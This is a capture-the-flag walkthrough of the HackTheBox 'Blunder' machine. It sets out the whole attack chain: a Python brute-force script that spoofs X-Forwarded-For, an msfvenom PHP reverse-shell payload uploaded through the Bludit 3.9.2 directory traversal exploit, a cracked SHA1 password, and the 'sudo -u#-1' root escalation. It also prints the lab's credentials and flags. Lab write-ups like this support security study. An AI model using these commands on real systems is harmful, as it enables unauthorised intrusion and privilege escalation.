HackTheBox-Machines-Blunder

From aldeid
Jump to navigation Jump to search

HackTheBox > Machines > Blunder

OS Linux
Difficulty Easy
Points 20
Release 30 May 2020
IP 10.10.10.191

User flag

Services Enumeration

Let’s start by enumerating the services on the machine. Nmap reveals that only 1 port is open, this is the web server, running on its standard port (80).

PORT   STATE  SERVICE VERSION
21/tcp closed ftp
80/tcp open   http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts

Initial foothold

Main page

Accessing the website shows a blog with 3 posts. The source code discloses several paths, 1 of which involving the /bl-kernel/ directory, where directory listing is enabled. This directory contains several PHP files, and clicking on one of them displays the message Bludit CMS.

Bludit CMS

Bludit CMS (https://www.bludit.com/) latest version, at the time of this writing is 3.13.1.

The source code reveals that the version installed is 3.9.2:

<!-- Include Bootstrap CSS file bootstrap.css -->
<link rel="stylesheet" type="text/css" href="http://10.10.10.191/bl-kernel/css/bootstrap.min.css?version=3.9.2">

<!-- Include CSS Styles from this theme -->
<link rel="stylesheet" type="text/css" href="http://10.10.10.191/bl-themes/blogx/css/style.css?version=3.9.2">

Hidden directories and files

There is no robots.txt file, but enumerating the web server with gobuster reveals several hidden locations and hidden files:

[email protected]:/data/tmp$ gobuster dir -u http://10.10.10.191 -x php,bak,old,zip,txt,tar,gz -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.191
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,bak,old,zip,txt,tar,gz
[+] Timeout:        10s
===============================================================
2020/09/09 11:07:06 Starting gobuster
===============================================================
[REDACTED]
/about (Status: 200)
/admin (Status: 301)
/cgi-bin/ (Status: 301)
/install.php (Status: 200)
/LICENSE (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
/todo.txt (Status: 200)
===============================================================
2020/09/09 11:35:21 Finished
===============================================================

The /admin location shows an authentication form, but trying to enter common credentials (with username admin, root or bludit) only leads to a authentication failures.

The todo.txt file is interesting because it discloses a username (fergus)

[email protected]:/data/vpn$ curl -s http://10.10.10.191/todo.txt
-Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING

Brute forcing the authentication form

After searching for brute force attack related documents against the Bludit CMS, I found this post that explains how to bypass the internal anti-brute force mechanism, and even provides a python3 script.

I created a custom wordlist based on the web page, with the default depth settings, as follows:

[email protected]:/data/tmp$ cewl -w passwords.txt http://10.10.10.191

I slightly adapted the script to read this wordlist as follows:

#!/usr/bin/env python3
import re
import requests

host = 'http://10.10.10.191'
login_url = host + '/admin/login'
username = 'fergus'
wordlist = []

with open('passwords.txt') as f:
    content = f.readlines()
    pwd = [x.strip() for x in content]

wordlist = pwd

for password in wordlist:
    session = requests.Session()
    login_page = session.get(login_url)
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)

    print('[*] Trying: {p}'.format(p = password))

    headers = {
        'X-Forwarded-For': password,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
        'Referer': login_url
    }

    data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
    }

    login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)

    if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('SUCCESS: Password found!')
            print('Use {u}:{p} to login.'.format(u = username, p = password))
            print()
            break

The script was able to find valid credentials for the fergus user:

[email protected]:/data/tmp$ python3 bf.py 
[*] Trying: the
[*] Trying: Load
[*] Trying: Plugins

[REDACTED]

[*] Trying: best
[*] Trying: fictional
[*] Trying: character
[*] Trying: RolandDeschain

SUCCESS: Password found!
Use fergus:RolandDeschain to login.

Directory Traversal exploit

Having valid credentials (fergus:RolandDeschain), I was able to login against the /admin URL and navigate through the backend. I found a form to post content, and upload an image.

Looking for exploits affecting this release confirmed that there is a possible directory traversal vulnerability:

[email protected]:/data/tmp$ searchsploit bludit 3.9.2
----------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                     |  Path
----------------------------------------------------------------------------------- ---------------------------------
Bludit 3.9.2 - Directory Traversal                                                 | multiple/webapps/48701.txt
----------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

I downloaded the exploit and started to prepare the necessary files, as explained in the exploit itself. We need to generate 2 files, as follows:

[email protected]:/data/tmp/files$ msfvenom -p php/reverse_php LHOST=10.10.14.22 LPORT=4444 -f raw -b '"' > evil.png
[email protected]:/data/tmp/files$ echo -e "<?php $(cat evil.png)" > evil.png
[email protected]:/data/tmp/files$ echo "RewriteEngine off" > .htaccess
[email protected]:/data/tmp/files$ echo "AddType application/x-httpd-php .png" >> .htaccess

Once done, we need to change the IP and port in python file, and we can run the exploit:

[email protected]:/data/tmp/files$ python3 48701.py 
cookie: apnks075c2p3g17ir7otfnok26
csrf_token: 860c0faaf34d652892fb09e7561b568e7e38dd93
Uploading payload: evil.png
Uploading payload: .htaccess

At this stage, the malicious content has been uploaded, and we need to start a listener:

$ rlwrap nc -nlvp 4444

Now, browsing the following URL will call our reverse shell: http://10.10.10.191/bl-content/tmp/temp/evil.png

Lateral move

In the reverse shell, I started to browse the file system, and noticed that there are 2 users under the /home directory (hugo and shaun). The user.txt flag is in Hugo’s home but we can’t access it. A lateral move to hugo is obviously required.

[email protected]:~$ ls -la /home/hugo
ls -la /home/hugo
total 80
drwxr-xr-x 16 hugo hugo 4096 Sep  9 12:39 .
drwxr-xr-x  4 root root 4096 Apr 27 14:31 ..
lrwxrwxrwx  1 root root    9 Apr 28 12:13 .bash_history -> /dev/null
-rw-r--r--  1 hugo hugo  220 Nov 28  2019 .bash_logout
-rw-r--r--  1 hugo hugo 3771 Nov 28  2019 .bashrc
drwx------ 13 hugo hugo 4096 Apr 27 14:29 .cache
drwx------ 11 hugo hugo 4096 Nov 28  2019 .config
drwxr-xr-x  2 hugo hugo 4096 Nov 28  2019 Desktop
drwxr-xr-x  2 hugo hugo 4096 Nov 28  2019 Documents
drwxr-xr-x  2 hugo hugo 4096 Nov 28  2019 Downloads
drwx------  3 hugo hugo 4096 Apr 27 14:30 .gnupg
drwxrwxr-x  3 hugo hugo 4096 Nov 28  2019 .local
drwx------  5 hugo hugo 4096 Apr 27 14:29 .mozilla
drwxr-xr-x  2 hugo hugo 4096 Nov 28  2019 Music
drwxr-xr-x  2 hugo hugo 4096 Nov 28  2019 Pictures
-rw-r--r--  1 hugo hugo  807 Nov 28  2019 .profile
drwxr-xr-x  2 hugo hugo 4096 Nov 28  2019 Public
drwx------  2 hugo hugo 4096 Apr 27 14:30 .ssh
drwxr-xr-x  2 hugo hugo 4096 Nov 28  2019 Templates
-r--------  1 hugo hugo   33 Sep  9 09:21 user.txt
drwxr-xr-x  2 hugo hugo 4096 Nov 28  2019 Videos

Analyzing the /var/www directory was interesting because I noticed the presence of 2 instances of the Bludit CMS. Analyzing the configuration files in the most recent version led to disclosing Hugo’s password hash:

$ cat /var/www/bludit-3.10.0a/bl-content/databases/users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
    "admin": {
        "nickname": "Hugo",
        "firstName": "Hugo",
        "lastName": "",
        "role": "User",
        "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
        "email": "",
        "registered": "2019-11-27 07:40:55",
        "tokenRemember": "",
        "tokenAuth": "b380cb62057e9da47afce66b4615107d",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "instagram": "",
        "codepen": "",
        "linkedin": "",
        "github": "",
        "gitlab": ""}
}

The hash (faca404fd5c0a31cf1897b823c695c85cffeb98d) corresponds to Password120 (https://sha1.gromweb.com/?hash=faca404fd5c0a31cf1897b823c695c85cffeb98d). Let’s switch to hugo:

[email protected]:/var/www/bludit-3.9.2/bl-content/tmp/temp$ su hugo
su hugo
Password: Password120

[email protected]:/var/www/bludit-3.9.2/bl-content/tmp/temp$ id
id
uid=1001(hugo) gid=1001(hugo) groups=1001(hugo)

User flag

Now, we can get the user flag:

[email protected]:~$ cat /home/hugo/user.txt
fce4e1ae48b2333b6d46379152876f66

User flag: fce4e1ae48b2333b6d46379152876f66

Root flag

Escalation

Checking hugo’s privileges with sudo -l indicates that we are allowed to execute /bin/bash as any user but root:

[email protected]:~$ sudo -l
sudo -l
Password: Password120

Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash

However, we can exploit CVE-2019-14287 (https://www.exploit-db.com/exploits/47502) and elevate to root:

[email protected]:~$ sudo -u#-1 /bin/bash
sudo -u#-1 /bin/bash
[email protected]:/home/hugo# id
id
uid=0(root) gid=1001(hugo) groups=1001(hugo)

Root flag

Let’s get the root flag:

[email protected]:/root# cat /root/root.txt
cat /root/root.txt
4926d71e37b6c245b9c997a55041cff1

Root flag: 4926d71e37b6c245b9c997a55041cff1

Comments

blog comments powered by Disqus

Keywords: ctf hackthebox HTB bluditcms bruteforce directorytraversal CVE-2019-14287